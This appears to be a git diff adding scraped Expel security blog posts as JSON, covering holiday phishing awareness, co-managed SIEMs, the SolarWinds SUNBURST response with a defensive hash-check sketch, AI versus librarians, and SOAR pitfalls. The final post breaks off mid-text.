tactic \u2014 see another example below where a fake shipping notice prompted the recipient to click a link and provide personal information to reschedule a \u201ccanceled\u201d delivery. Fake shipping notification email The holiday season is a perfect time for would-be Grinches to raise their odds for success with these tactics as online shopping reaches peak levels for the year. A Who\u2019s to-dos: Got an email about an order or delivery you didn\u2019t place? Shipping confirmation that looks kind of sketchy? 
Here are some things you can do to avoid falling prey to this Grinchy scam: Double check the email address the shipping/delivery notice came from. Does it look legitimate? Does it match other shipping confirmation emails you\u2019ve previously received from the same company for orders you placed? If not \u2013 it\u2019s likely a scam. Check the email for errors \u2013 is the company\u2019s name or other text misspelled? Is the language odd or stilted? These could be signs that the email isn\u2019t legitimate since companies go to great lengths to make sure their emails are largely error-free. If you have any suspicions that an email might not be legit, don\u2019t click any links or call the phone number provided in the email \u2013 and definitely don\u2019t give them any of your personal information! Instead, look up the verified customer service number for that company online and go through their legitimate support center to look into the order or delivery. If they can\u2019t find it, it\u2019s a good sign it was a scam. That\u2019s not Santa \u2013 that\u2019s the Grinch! Aka: CEO impersonation The TL;DR for this one: unless it\u2019s a regular part of your job, it\u2019s probably safe to assume your boss wouldn\u2019t ask you to do her holiday shopping. We see a number of campaigns come through our SOC every year where Grinches dress up like Santa and try to rope employees into helping them steal all the gifts (or gift cards, in this case). For example, in the email below, our Grinch created an email address imitating that of the company\u2019s CEO and targeted a company employee, asking to speak offline about a \u201cpersonal errand.\u201d CEO impersonation email request Attackers often like to move the conversation away from email to lower the chance of being discovered. Asking for cell phone numbers allows them to use calls or texting for further interactions. We\u2019ve seen similar emails with language like: \u201cSend me your cell phone number for an urgent task\u201d \u201cKindly reconfirm your cell phone #, I need a task done immediately\u201d \u201cPlease kindly resend your cell phone number to me\u201d Our gift-stealing Grinches then usually ask their victims to purchase gift cards and send pictures of the redemption codes. Communicating by text/smartphone makes receiving that info quick, easy, accessible, and fairly anonymous. And the victim is then out the money they spent on the gift cards with little recourse to get it back. Attackers often use publicly-available information like org charts on a company\u2019s website or networking sites like LinkedIn to perform reconnaissance and target individuals who are newer to the company and likely eager to impress their boss. Which means, historically, we\u2019ve seen interns, new graduates, and other new hires frequently targeted in these scams. So what can you do to keep the cyber Grinches from looking like this ? A Who\u2019s to-dos: If you receive an unexpected email from \u201cyour boss\u201d asking you to contact them offline or purchase things for them that aren\u2019t part of your regular responsibilities, first: don\u2019t respond or give them your number! Second, contact your boss through another channel of communication like your company\u2019s instant messaging app, a new email to their verified company email address, or a phone call if you have their number. Confirm whether they sent the request. If not, it was likely a scam and you should report it to your company\u2019s IT/security team. 
If the person reaching out isn\u2019t someone you normally talk to, find someone in your network who can reach them through legitimate channels. Click this link to see your Whobilation invite! Aka: Credential harvesting through phishing The hustle and bustle of the holiday season is perfect timing for another Grinchy favorite \u2013 catching busy Whos off-guard with phishing emails posing as legitimate business activities to harvest recipients\u2019 login credentials. A common tactic is for attackers to send an email pretending to share a legit business document (an invoice that needs signing, a contract, etc.) through a file-sharing application like DocuSign, Microsoft OneDrive, or Microsoft Office365. The link in the phishing email then takes the recipient to a credential harvesting portal posing as a login page for one of those file-sharing services. When the recipient enters their login info to access the document, the attacker captures that information and can then use it to access that recipient\u2019s inbox (and potentially other parts of an org\u2019s systems and applications if business email credentials are captured). Below is an example of a fake login portal we\u2019ve seen. There are often subtle differences (like typos, missing or different images, abnormal language) between these fake portals and the real login pages, but attackers hope busy employees won\u2019t stop and notice these abnormalities. Credential harvesting page posing as a Microsoft login page This page may look legit at first glance, but the URL in the browser shows that this is definitely not a Microsoft-owned page. Another common tactic Grinches use to collect credentials is sending recipients a PDF file to download (again posing as a legitimate business document like an invoice or contract). Sometimes PDF, ZIP, and other files attached to phishing emails are password protected to circumvent companies\u2019 security tech. The attacker then includes the password in the body of the email, allowing their victims to open the document and interact with whatever\u2018s inside (this is also a common method for attackers to insert malware onto targets\u2019 computers). Within the PDF, attackers will instruct recipients to access a link in the document. The link often redirects multiple times before ultimately landing on the attacker\u2019s credential harvesting page, again usually imitating a legitimate login page to trick potential victims into entering their credentials. Once a Grinch has stolen a recipient\u2019s credentials and gained access to their inbox, they typically look for emails about invoices or other financial information to insert themselves into the conversation and attempt to divert payments to a different account they\u2019ve set up. In one example, we saw an attacker successfully divert payment for a person\u2019s African safari vacation into the attacker\u2019s account. These phishing emails target our inclination to respond promptly to communications from co-workers, vendors, or clients if we think action is required, like returning an invoice. Subject line keywords that promote action or a sense of urgency are favorites for attackers because they prompt people to click without taking as much time to think. A Who\u2019s to-dos: If you receive an email link to access a file, or an attached file that you aren\u2019t anticipating, don\u2019t click any links or open any files right away. First double-check the sender \u2013 is this someone you know? Is their email address legitimate? 
If not, it could be a phishing email. If you find yourself on the login page for a file-sharing service, check if there\u2019s anything off. Are there any typos? Images that won\u2019t load? Oddly-written text or descriptions? Look at the URL \u2013 does it seem right? If you regularly use this service for work or personal file sharing, does this login page match what you usually see? If the answer to any of these questions is no, don\u2019t put your information in \u2013 it could be a credential harvesting site posing as a login page. If a suspected malicious email is sent to your work account, report it to your company security/IT team so they can check if other employees at your company were targeted by the same phishing campaign and if any accounts were compromised. While you order your Roast Beast delivery\u2026 Aka: The most important thing to do while online shopping this season We\u2019ve covered some of the top scams you should keep an eye out for in your inbox this holiday season. But what about while you\u2019re hunkered down in front of your internet browser with a double espresso, noise-cancelling headphones, and your credit cards at 12 am this Black Friday and Cyber Monday? Our most important tip \u2013 don\u2019t reuse passwords! This will help protect you from credential stuffing attacks. Credential stuffing is a type of cyberattack where cyber Grinches take one set of stolen login credentials (for example, if your username and password to a site were leaked in a data breach and can now be found on the illicit web), then use automation to try them across a variety of sites or applications. It\u2019s possible attackers will try to compromise online retailers\u2019 systems this holiday season to access credentials for their users\u2019 accounts, either by taking advantage of vulnerabilities in a retail site\u2019s security or, more commonly, through credential harvesting like we discussed above. If successful, it\u2019s easy for the attackers to then use the same credentials they obtained at other retailers or institutions, like financial providers. This can allow them to place fraudulent orders, steal credit card information stored on retailers\u2019 sites, or access their victims\u2019 financial and email accounts (where wire fraud and other financial crimes are their targets). As you register for accounts while online shopping this season, use unique, strong passwords (or better yet, passphrases!) for each site. This helps mitigate the impact if one of your accounts is compromised by keeping your other accounts secure. A Who\u2019s to-dos: Use different passwords for each of your accounts, particularly accounts that provide access to sensitive or personal information (like financial accounts, credit card information, or your address). Using a centralized password manager allows you to store unique, complex passwords for all of your accounts in a secure but easily accessible way. Use multi-factor authentication (MFA) on all of your accounts. MFA requires a second verification step beyond your login info (for example, providing a code sent to your phone number on file) to access your account. So even if an attacker gets your credentials, MFA will help prevent unauthorized access to your account until you can reset the password. Most sites and apps have an option to enable MFA for logins to your account, often with customizable preferences. Wrapping it all up Cyber Grinches are out there, hoping and wishing To steal all your cheer with some holiday phishing. 
So have your guard up and pay close attention To emails and websites for scam prevention! Keep your inbox secure and logins protected, And don\u2019t click on anything that\u2019s unexpected. Our top tips are below for your peace of mind To avoid cyber trouble this holiday time! Remember: Check senders\u2019 email addresses if an email is remotely suspicious or unexpected. Don\u2019t click links or open attachments from senders you don\u2019t recognize or aren\u2019t expecting. If you click a link in an email, check the URL it brings you to \u2013 does that URL look legitimate for that company? If not, don\u2019t put in any personal information. Look for abnormalities in emails or login pages that might indicate they\u2019re fake (for example: typos, missing or unloaded images, oddly-written language or anything else that differs from your typical experience with that site/provider). Don\u2019t provide personal information to anyone claiming to be customer service over the phone unless you personally called that company\u2019s verified customer service number. Double check unusual requests from your boss through another communication channel \u2013 not just by hitting reply. Report anything suspicious in your work accounts to your company\u2019s security/IT team so they can investigate and look for other instances at your org. Use unique passwords for each account you create. And a last parting thought if your org needs support For monitoring and response when there\u2019s phishing to thwart \u2013 Reach out to our team about our contribution, Expel Managed Phishing could be your solution! Have a safe and happy holiday season from all of us at Expel!" +} \ No newline at end of file diff --git a/the-myth-of-co-managed-siems.json b/the-myth-of-co-managed-siems.json new file mode 100644 index 0000000000000000000000000000000000000000..431180e1906a729319337b61924428334e677af5 --- /dev/null +++ b/the-myth-of-co-managed-siems.json @@ -0,0 +1,6 @@ +{ + "title": "The myth of co-managed SIEMs", + "url": "https://expel.com/blog/the-myth-of-co-managed-siems/", + "date": "Aug 25, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG The myth of co-managed SIEMs Security operations \u00b7 5 MIN READ \u00b7 BRUCE POTTER \u00b7 AUG 25, 2020 \u00b7 TAGS: CISO / Managed detection and response / Managed security / Management / SIEM Maybe you\u2019ve already got a SIEM and you\u2019re looking for help managing it. Maybe you\u2019re thinking of buying a SIEM and concerned it might be too much to handle on your own. Or maybe you\u2019re using an MSSP and thinking of gaining more control of your data by working collaboratively in your SIEM rather than letting them do all the work. However you\u2019ve arrived at the concept of \u201cco-managed SIEM,\u201d there\u2019s a number of potential pros and cons to think about when making your decision. It\u2019s important to really understand what you\u2019re going to get out of a co-managed SIEM \u2013 it\u2019s a big resource and dollar commitment, and mistakes made early on can take a long time to correct. Our team encounters a lot of co-managed SIEM myths. In this blog post, I\u2019ll share the most common myths we\u2019ve heard and our perspectives on the reality of co-managed SIEMs through the lens of how we do things here at Expel. 5 perceived benefits of co-managed SIEM Myth: It\u2019s the only way to get transparency. One of the biggest benefits people want from co-managed SIEM is visibility into their security operations. 
By working with a partner in your SIEM, you maintain some control over the detection rules that are in place, the sources of data and what your analysts are doing (regardless of whether they\u2019re YOUR analysts or your partner\u2019s analysts). Reality: There are other (better) ways to get transparency. We strongly believe that you can\u2019t build trust without transparency. It\u2019s key to being a good partner to our customers. It\u2019s also vital for efficiency and accuracy. So we\u2019ve put a lot of thought into what transparency should look like in practice. At Expel, we provide our customers with complete visibility into our analysis and investigations \u2013 in fact, we invite all our customers to watch what we\u2019re doing in Expel Workbench or talk with us in a dedicated Slack channel as an incident unfolds. We literally work alongside your analysts to prosecute events and respond to incidents. Example conversation in Expel\u2019s customer Slack channel Further, you can review all activity to check our work \u2026 make sure you agree with what we\u2019ve done and help improve detection and response capability. We want all third-party security providers to be held to the same account, since this is what we\u2019d expect from any MSSP we deal with (we\u2019re a customer of ourselves, so it works out great for us). Myth: Greater control over business logic produces more detection value. Your SIEM is the codification of business logic you use to detect specific threats inside your organization. Custom rules and configurations allow you to look for attacks tailored to your systems and architectures. A co-managed SIEM allows you to continue to maintain this business logic. Reality: The vast majority of what you detect is the same as your peers and many other companies. Orgs think they want more control to write rules and generate alerts, but they don\u2019t realize how much it costs to manage detection content. Unless you invest a lot in this area, you\u2019ll end up with a pile of false positives. In reality, your rules probably aren\u2019t as unique as you think. Your provider has an advantage since they see the big picture (AKA lots of customers) and have the expertise to manage the detection content. However \u2026 You should expect your security provider to tailor their detection strategy for you to your business. This could mean fine tuning rules that already exist, taking advantage of rules you\u2019ve written in your SIEM or working together to build new rules in our platform. Have a suggestion? No problem. Just let us know and we\u2019ll work to understand the use case and ensure you\u2019re covered. No matter what security provider you work with, once you share your suggestion they should do the rest. Myth: You\u2019ll get assistance from outside experts. By going to a co-managed SIEM, you\u2019re hoping to take advantage of the collective knowledge from your service providers. Presumably your provider has seen lots of good and bad and can advise you and your team on doing SIEM better. You\u2019d also think that they will answer general security questions and concerns you may have. Reality: You should expect this assistance from your third-party security partners. Once again, your third-party security partner shouldn\u2019t just process alerts. MSSP\u2019s have lots of institutional knowledge they can share to help improve your broader security program. 
We work to push as much information to our customers (and publicly) as we can to help everyone make their organizations more secure. Further, our engagement managers are a window into Expel that can get you answers to tough security questions. Myth: My SIEM will have all of the data required for detection and response. Many organizations envision their SIEM as the single place where all data exists for detection and investigation. Thinking about co-managed SIEM as a strategy doubles down on this assumption as you\u2019re paying for a provider to help manage that signal and detection content. The hope is that your SIEM will provide visibility across the entire environment and enable your team to respond to all kinds of threats. Reality: Storing data in a SIEM is a lot of work. Getting all the data that you want into a SIEM can be an exhausting process. And making sure it continues to go into a SIEM isn\u2019t much easier. We\u2019ve built API integrations with over 45 different vendors. We learned pretty quickly that data sent to a SIEM is not nearly as rich as data that can be pulled from an API \u2013 which can inhibit detection and response with a SIEM. As organizations increasingly use cloud applications and infrastructure, the vision of the SIEM as a single source of truth starts to make less sense. So it\u2019s important to evaluate why you need (or think you need) a SIEM. There will be instances when sending your data to a SIEM is a wise choice (we\u2019ll explore this a bit more in a future blog post). But, for example, you don\u2019t need to store those Office 365 or AWS logs in your SIEM when your cloud provider is already storing them for you and your MSSP can consume them directly. That\u2019s why we connect directly to cloud providers \u2013 meaning that regardless of the choice you make, you\u2019ll always get the visibility you need. And the reality that\u2019s all too familiar \u2026 This is a big one. It\u2019s \u201ctoo many cooks in the kitchen.\u201d One of the problems with a co-managed SIEM is orchestrating who is doing what. A SIEM is a big piece of technology and dividing up responsibilities can be confusing. Who handles upgrades? Who\u2019s responsible for rule QA? Who handles device integration? How about analyst shifts? If the answer is \u201cit depends\u201d \u2013 expect friction! By having a third-party security partner rather than a co-managed SIEM, the roles are clearer for both your staff and the service provider. Avoiding confusion at this stage helps ensure you\u2019re focused on the right issues (like generating good signal, minimizing noise and detecting bad actions) and not wasting time on RACI charts and scheduling. The chart below gives you a general idea of how we might assign roles at Expel: Roles and responsibilities with third-party security partner
Responsibility | Co-Managed SIEM | Expel
System Upgrades | Provider | You
Log Source Onboarding | Both | You
Health Monitoring | Both | Expel
Rule Management | Both | Expel
Alert Triage & Investigation | Both | Expel
Reporting | Both | Expel
Remediation | You | You
The value in SIEMs We think SIEMs are a valuable part of an organization\u2019s security architecture. When properly fed, they are the source of truth for an investigation. The information and analytical capability in your SIEM can be invaluable for analysts and investigators when working through the trail of alerts and data involved with suspicious activity.
Further, SIEMs are great data normalizers.Taking in unstructured data, providing structure and storing in an orderly way can open up many more opportunities for signal generation in your company. Data that might otherwise go ignored can be put to great use in your SIEM. Finally, they\u2019re great tools for your analysts. From experimentation to ongoing operations, a good SIEM and staff that know how to use them can fulfill their promise \u2026 serving as a focal point for your security operations. However, even the best SIEM needs people. If you don\u2019t have in-house expertise and are thinking about co-managed SIEM as an option, consider these common myths and what you could accomplish by asking more of your third-party security partner. A service (like Expel) that can transparently use your SIEM can be a real game changer in your security program. Let us know if you want to chat ." +} \ No newline at end of file diff --git a/the-security-people-s-guide-to-expel-s-exe-blog.json b/the-security-people-s-guide-to-expel-s-exe-blog.json new file mode 100644 index 0000000000000000000000000000000000000000..f2efffdcd7b921aa63c754b4c3133112a203e37f --- /dev/null +++ b/the-security-people-s-guide-to-expel-s-exe-blog.json @@ -0,0 +1,6 @@ +{ + "title": "The security people's guide to Expel's exe blog", + "url": "https://expel.com/blog/security-peoples-guide-expels-exe-blog/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG The security people\u2019s guide to Expel\u2019s exe blog Expel insider \u00b7 2 MIN READ \u00b7 DAVE MERKEL \u00b7 AUG 24, 2017 \u00b7 TAGS: Announcement / Company news \u201cRemember that time we started an information security company?\u201d Yeah, yeah I do. Twice. Who would do that, you ask? Who would first commit one of the classic blunders (quick recap for those that don\u2019t know the list, they are: 1) land wars in Asia, 2) mixing death and Sicilians, and slightly less well known 3) building endpoint security products) AND THEN jump back into \u201cthe cybers\u201d for another go-round? Me, I guess. I\u2019m that guy. I\u2019m the guy that also commits the rarely cited, but oh so true, fourth classic blunder: volunteer to write the first post of a new blog. By \u201cvolunteer\u201d I, of course, mean \u201cfailed to outrun marketing.\u201d Hi everyone, I\u2019m merk (this is where you say \u201chi merk\u201d). My given name is David, and I\u2019ve occasionally been called Dave, but if you want to get my attention in a crowded room to, say, get you another beer, I recommend sticking with \u201cmerk\u201d. No caps please, it cramps my style. My colleagues and I at Expel are new here. You\u2019ll be hearing quite a bit more about us in the future. So let me take just a couple minutes to introduce who we are and why you might care. Note I said who we are, not what we do. We\u2019re not quite ready to talk about that yet, but stay tuned. I should probably start using buzzwords here, like luminary or perhaps ninja . World renowned and market-leading should also show up. However, who we are could best be summed up as not those people . We do what we do because we love information security, love helping our customers, love working with each other, or some combination of all three. 
We\u2019re not big fans of how information security companies talk about themselves, but we are big fans of cool infosec things, whether they\u2019re new technologies, attack methods, intelligence analysis, or even just lessons learned from a hard day at the office\u2026 and holy crap do I have a ton of those. My best stories usually start out like this: \u201cLet me tell you about the time I screwed this thing up\u2026\u201d One thing I didn\u2019t screw up: the team we have here at Expel: sharp developers, analysts, seasoned security veterans and business professionals. They\u2019re all way smarter than I am, and it turns out they have some pretty interesting things to say. So we\u2019re creating this blog as a forum for you to hear a bit more from them. They don\u2019t want to spend time talking about Expel, per se. They want to spend time talking about information security , about those \u201caha!\u201d and \u201coh yeah!\u201d moments we have while we pursue our passion for protecting our customers. And occasionally, those \u201coh shh\u2026.\u201d moments when we screw something up. Hopefully, you can take an executable tidbit out of everything we say \u2013 a tip, trick, technique \u2013 something to make your information security world easier, better, or more fun. Come along with us. Bookmark our exe blog , tell your friends and engage us on the socials (twitterinstagramchat or whatever you crazy kids are using these days, marketing link here because they made me: follow us on LinkedIn and Twitter ). And please, please let me know if any of us use the phrase global market-leading cybersecurity company . Anyone caught doing that buys the next round. Oh yeah, and we\u2019re hiring !" +} \ No newline at end of file diff --git a/the-soc-organic.json b/the-soc-organic.json new file mode 100644 index 0000000000000000000000000000000000000000..88744711b5d250bee5eb2afb1f7e8b7851fc6a69 --- /dev/null +++ b/the-soc-organic.json @@ -0,0 +1,6 @@ +{ + "title": "The SOC organic", + "url": "https://expel.com/blog/the-soc-organic/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG The SOC organic Security operations \u00b7 4 MIN READ \u00b7 DAVE JOHNSON \u00b7 MAR 14, 2023 \u00b7 TAGS: MDR These days, you can\u2019t swing a quantum cat without hitting a conversation about how recent artificial intelligence (AI) breakthroughs are changing our lives. Having grown up during the dawn of personal computing, the internet (*insert dialup modem sounds*), and cybersecurity, embracing new technology to find out what cool new things I can do is totally my jam. I\u2019m right there along with you in the assess, adapt, and adopt queue with AI. Innovations like ChatGPT are incredible. However, they\u2019re primarily designed to solve a problem we didn\u2019t have in The Olden Times\u00a9. Before the information superhighway, before copying and floppying, before we surfed the world wide web, we had\u2014stay with me here\u2013libraries. And so far, AI hasn\u2019t managed to replicate what\u2019s best about libraries. You may be asking yourself, \u201cWhat does this have to do with cybersecurity?\u201d Read on to find out. I absolutely adore libraries. The more books the better. Old books, new books, books written in other languages, reference, literature, fiction, everything, all of it. But books, admittedly, have some significant limitations. They\u2019re not immediately searchable and it\u2019s not easy to consume the data at speed, for example. 
The information in a book that you want must be ingested, deciphered, and contextualized. Some books and some readers do that far better than others, but the results are inconsistent. In the past, reading fast and being able to comprehend everything as much as possible in a systematic way was the primary strategy for getting the information you needed (aka \u201cresearch\u201d). Digital publishing and search engines fixed all that. They initially solved the problem quite well and we were all participants in this great experiment of connecting the world to information and placing it at our fingertips. At any given time I can search and receive the exact answer to a query like, \u201cWhat is the airspeed velocity of an unladen swallow?\u201d just by typing or speaking the question into the appropriate search engine. (It\u2019s 31-40 mph, BTW.) Then things changed. Search engines improved their capabilities and the dataset grew, but now we have a different challenge standing between us and the information we seek\u2014namely, search engine marketing. One problem is that organic results, which are usually what you\u2019re looking for, can be buried beneath advertising (many times the top organic result doesn\u2019t even appear on the first screen). Also, as most of us know from frustrating experience, it can still be hard to find what you want\u2014we can try every combination of search terms we can think of and still come up dry. That\u2019s where the new AI chatbots come into play (Microsoft recently launched its new ChatGPT-fueled Bing and Google\u2019s Bard is on the way). Given the right prompt, they can help us cut through the noise to the information we really want. We all ultimately want clear answers, and AI does this pretty well. (Although the ads won\u2019t go away, there should now be a cleaner signal:noise ratio.) There are some things missing, though. Context for one. For example, AI knows your purchasing history and consumer profile, but it doesn\u2019t necessarily know you or your hopes and dreams, as it were. It doesn\u2019t have any lived experiences that mirror your own. These context-free large language models have never been a person before (as recent chat transcripts make clear). They won\u2019t necessarily make connections to secondary factors relevant to your inquiry and they probably won\u2019t have a useful knack for the tactical application of serendipity. Libraries have always had a solution to that problem, though. Enter stage left, the amazing and borderline-omniscient Research Librarian! Ask any question of this highly trained, friendly neighborhood expert in just about everything, and you\u2019ll shortly receive straight, relevant answers, additional recommendations, along with additional context. Their training and experience allows them to deliver these results in the way you find most useful. I now submit to you, Dear Reader, my thesis: human civilization, in the development of AI, has been trying to reinvent something we pretty much always had, and still have today. Clear answers, delivered in a way that makes sense, with other valuable information attached and applied in a personalized context\u2014I think along the way we simply became so distracted by shiny new objects that we forgot the important part. Information, like any tool, is only as good as your ability to use it, and how it\u2019s delivered matters. And now, we come to answering the question posed above. Our team here at Expel keeps that end goal in mind. 
Our customers tell us they need max signal\u2014specific information, relevant context, references, and suggestions for further reading, and they need the noise eliminated. To deliver on that, we believe managed detection and response (MDR) should be as organic as possible and it should seamlessly integrate the best available automation technologies with the experience and insight of analysts who\u2019ve been there, done that, and understand what customers need. Tools should be designed and implemented with the ability to scale in mind and customers\u2019 desired results should always be the foundation for everything a provider does. This is the issue: what makes libraries awesome, and what AI is missing, is people. And we\u2019re big fans of people. As customers shop around the security space, they always hear how there\u2019s a better way. But too many have never been asked, only told. If security vendors pose questions and listen in good faith, prospects will tell them what that better way looks like. So as we consider the role that AI plays in cybersecurity, remember that it\u2019s a tool. It\u2019s pretty darn interesting, and brings with it major potential. But unless something significant changes, it won\u2019t deliver the outcomes that organizations need to keep their systems safe without a human touch and perspective. One more thing. If it\u2019s been a while since you\u2019ve visited your local public library, now is a great time to go. The membership cards are a lot cooler now, there\u2019s terabytes and tebibytes of digital comic books you can download and read, and some branches even have 3D printers and CnC machines you can use. While you\u2019re there, chat with the research librarians and ask them about the services they provide. Maybe tell them, \u201cExpel sent me.\u201d They\u2019ll initially have zero idea what you\u2019re on about, of course, but if you send them this post it just might provide them additional\u2026and relevant\u2026context. Great eXpeltations 2023" +} \ No newline at end of file diff --git a/the-solarwinds-orion-breach-6-ideas-on-what-to-do-next.json b/the-solarwinds-orion-breach-6-ideas-on-what-to-do-next.json new file mode 100644 index 0000000000000000000000000000000000000000..679dc7509adfeb65e524e86a3d7a66d958e7c918 --- /dev/null +++ b/the-solarwinds-orion-breach-6-ideas-on-what-to-do-next.json @@ -0,0 +1,6 @@ +{ + "title": "The SolarWinds Orion breach: 6 ideas on what to do next ...", + "url": "https://expel.com/blog/solarwinds-orion-breach-what-to-do-next/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG The SolarWinds Orion breach: 6 ideas on what to do next and why Security operations \u00b7 3 MIN READ \u00b7 JON HENCINSKI, ANTHONY RANDAZZO, BRUCE POTTER AND MARY SINGH \u00b7 DEC 16, 2020 \u00b7 TAGS: Cloud security / MDR / Tech tools Well, 2020 is really going out with some fanfare, isn\u2019t it? The revelation of SolarWinds\u2019 Orion monitoring product being compromised by nation state intelligence is keeping a bunch of people very busy heading into the holidays. \u201cBah humbug\u201d to that. With a few days hindsight, we wanted to take a breath and offer some observations on how things are going, what we can expect going forward and how organizations everywhere should be thinking about detecting post-compromise malicious activity. 
Before we dive into the \u201chere\u2019s what we\u2019re seeing and how you should plan for the long haul,\u201d let\u2019s take a minute to applaud the leadership shown by FireEye, Microsoft and CISA. These orgs continue to be transparent on the technical and mission aspects of this attack. That transparency helped the entire cybersecurity industry understand the technical nature of the attack and begin to wrap our arms around the broader business impact to our customers. In turn, that helps our customers and any impacted businesses, in general, better understand their own risk as they navigate their way through this mess. Now let\u2019s dig into some observations and recommendations: You\u2019ll need to rewind the clock as you search for evidence of compromise as a result of the SolarWinds Orion breach. We\u2019ve seen instances of the backdoored SolarWinds Orion signed DLL, known as SUNBURST in many organizations, as have our peers. SolarWinds indicated up to 18,000 organizations may be vulnerable to this exploit, so it\u2019s hard to overstate the potential impact this backdoor could have on a broad set of industries. One of the challenges we\u2019re facing in scoping these incidents is the need to rewind the clock sufficiently to see when the earliest potential malicious actions could have taken place. In this case, SolarWinds indicated their software was implanted nine months ago, so ideally we\u2019d like to look through nine months of evidence to see signs of attack activity. Data retention policies might make this difficult. Unfortunately, retention policies can get in the way of this kind of look back and we may only get a few weeks or months worth of data to review. Data retention is a hard scale to balance; limiting cost and improving performance while maximizing historical accuracy means some organizations have the data they need in the wake of this breach but others do not. But vendors are (thankfully) jumping in and creating detections that\u2019ll help security teams everywhere identify and mitigate related attacks in the future \u2013 so ask your vendors what detections they\u2019re working on. Thanks to the turbo-charged @andrew__morris observation that the backdoored software was still on SolarWinds\u2019 website on Monday, December 14th, we continued to see new instances of the malicious DLL created on disk as customers attempted to upgrade their installation. Why is this good news? Because at least by that time most security vendors had detections in place so we saw it land and were able to immediately remediate. A big shout out to the vendor community at large for getting those detections created and pushed out in a timely manner. It makes a huge difference to operators when the cycle between news breaking and having functional detections in place is as short as possible. There\u2019s more good news: We haven\u2019t seen any evidence of recent SUNBURST command and control. This is a great sign for our customers. We do however have limited telemetry for our customers and this breach dates back to March 2020. This kind of event underscores the importance of having a fully functional EDR solution. In particular, you need one that supports robust remote forensic examination of a system. Being able to investigate endpoints at scale in an automated fashion to assess impact and risk to an organization as quickly as possible is incredibly important in an event like this. The bummer with these tools is that they really shine when the situation is the darkest. 
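If you\u2019re wondering what \u201cinvestigate endpoints at scale\u201d looks like in practice, here\u2019s a rough sketch of the kind of check an EDR sweep automates: walk the usual Orion install paths, hash any SolarWinds.Orion.Core.BusinessLayer.dll you find and compare it against known-bad SUNBURST hashes. The search roots and the hash set below are placeholders, not vetted indicators \u2013 a real hunt would use your EDR\u2019s own query capability and a current IOC feed.

```python
# Rough sketch of a single-host SUNBURST file check. The search roots and the
# hash set are placeholders (assumptions), not real indicators; swap in vetted
# IOCs from your threat intel source before using anything like this.
import hashlib
from pathlib import Path

SEARCH_ROOTS = [
    Path('C:/Program Files (x86)/SolarWinds'),
    Path('C:/Program Files/SolarWinds'),
]
KNOWN_BAD_SHA256 = {
    '0' * 64,  # placeholder entry
}

def sha256_of(path):
    digest = hashlib.sha256()
    with path.open('rb') as fh:
        for chunk in iter(lambda: fh.read(1024 * 1024), b''):
            digest.update(chunk)
    return digest.hexdigest()

for root in SEARCH_ROOTS:
    if not root.exists():
        continue
    for dll in root.rglob('SolarWinds.Orion.Core.BusinessLayer.dll'):
        digest = sha256_of(dll)
        verdict = 'matches known-bad hash' if digest in KNOWN_BAD_SHA256 else 'no IOC match (record it anyway)'
        print(dll, digest, verdict)
```

Run across every endpoint by an EDR platform, that same check becomes a single query instead of a manual slog \u2013 which is exactly what you want when you\u2019re trying to rewind the clock nine months.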
On a normal day when everything is normal you don\u2019t think, \u201cGosh! I wish I had a better EDR tool.\u201d But when things go totally sideways like they did this week, the quality of your EDR can change (or destroy) the game. With that said, sometimes a historical compromise like this can only be addressed with a good ol\u2019 fashioned incident response engagement. Be on the lookout for the long tail of compromise. The tail of these kinds of attacks can be quite long, and adversaries who entrenched themselves inside your org can be difficult to fully root out. Moving forward, we\u2019re focused on finding post-compromise activity observed during this global threat campaign. In particular, we\u2019re building detections and hunts for events such as Azure AD PowerShell behavior, modification of domain federation trust settings, and researching ways to discover forged SAML tokens, anomalous logins, Azure lateral movement, and privilege escalation activity. While many of these are events we\u2019re looking for anyway, we\u2019re turning the dials on orgs that may be compromised via SUNBURST to surface more of these events and correlate them in new ways based on the TTPs that were published as part of this attack. That\u2019s it for now. Thank goodness \u2026 IT and security folks everywhere don\u2019t need any more to deal with. In the coming weeks, we\u2019ll have even more visibility on both the technical and business shifts that are happening in both the cybersecurity industry and the economy at large. We\u2019ll keep you posted as we learn more. As always, we\u2019d love to hear from you if you have thoughts to share." +} \ No newline at end of file diff --git a/the-top-cybersecurity-attack-trend-we-saw-emerge-during.json b/the-top-cybersecurity-attack-trend-we-saw-emerge-during.json new file mode 100644 index 0000000000000000000000000000000000000000..6bf5e03eb868701e4c91e74831adc558d8a769bc --- /dev/null +++ b/the-top-cybersecurity-attack-trend-we-saw-emerge-during.json @@ -0,0 +1,6 @@ +{ + "title": "The top cybersecurity attack trend we saw emerge during ...", + "url": "https://expel.com/blog/top-cybersecurity-attack-trend-covid-phishing/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG The top cybersecurity attack trend we saw emerge during the COVID-19 pandemic Security operations \u00b7 ANTHONY RANDAZZO \u00b7 MAY 6, 2021 \u00b7 TAGS: Cloud security / MDR Finally \u2013 2020 is behind us. Unfortunately, Expel\u2019s SOC observed that attackers used the pandemic as an opportunity to evolve some nasty tactics. We pulled some data on the incidents we responded to over the past year and noticed a clear trend: phishing and BEC remain a top threat. Check out our infographic to get the full download on what our data reveals about the top attack trend in 2020 (and now)." 
+} \ No newline at end of file diff --git a/the-top-five-pitfalls-to-avoid-when-implementing-soar.json b/the-top-five-pitfalls-to-avoid-when-implementing-soar.json new file mode 100644 index 0000000000000000000000000000000000000000..52d779a3375519d0e7c8827be8f2e143c23ceba7 --- /dev/null +++ b/the-top-five-pitfalls-to-avoid-when-implementing-soar.json @@ -0,0 +1,6 @@ +{ + "title": "The top five pitfalls to avoid when implementing SOAR", + "url": "https://expel.com/blog/top-five-pitfalls-avoid-implementing-soar/", + "date": "Jul 10, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG The top five pitfalls to avoid when implementing SOAR Security operations \u00b7 8 MIN READ \u00b7 YANEK KORFF \u00b7 JUL 10, 2019 \u00b7 TAGS: CISO / Managed security / Management / Planning I was recently in a room full of CISOs and the topic-du-jour was SOAR . The headline on the PowerPoint slide read \u201cSOAR or SORE?\u201d \u2014 a joke to get the conversation started. Given limited budgets and the general shortage of experienced security talent, most of the CISOs in the room were already looking to automation to help bridge the gap between their operational reality and the unrealistic expectations of the rest of the business. But was automation really closing that gap? \u201cNo\u201d was the popular response, which came amid a smattering of \u201cnot yets\u201d and \u201cit\u2019s starting to.\u201d It seemed that at least some orgs were beginning to implement systems that were automating workflows and streamlining security operations. But is merely beginning to automate things here and there enough 